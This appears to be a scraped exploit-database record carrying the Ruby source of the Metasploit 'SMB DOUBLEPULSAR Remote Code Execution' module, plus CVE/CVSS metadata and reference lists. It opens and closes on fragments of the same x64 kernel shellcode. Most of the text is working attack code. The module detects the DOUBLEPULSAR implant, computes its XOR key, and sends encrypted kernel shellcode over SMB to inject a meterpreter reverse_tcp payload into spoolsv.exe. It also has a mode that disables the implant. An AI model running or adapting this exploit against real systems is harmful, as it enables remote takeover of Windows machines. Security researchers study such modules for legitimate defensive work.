\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-26T00:14:40", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "50c74dc096fe1b4956380af53bf77ca6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-26T22:17:27", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:14:40", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-26T00:14:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n 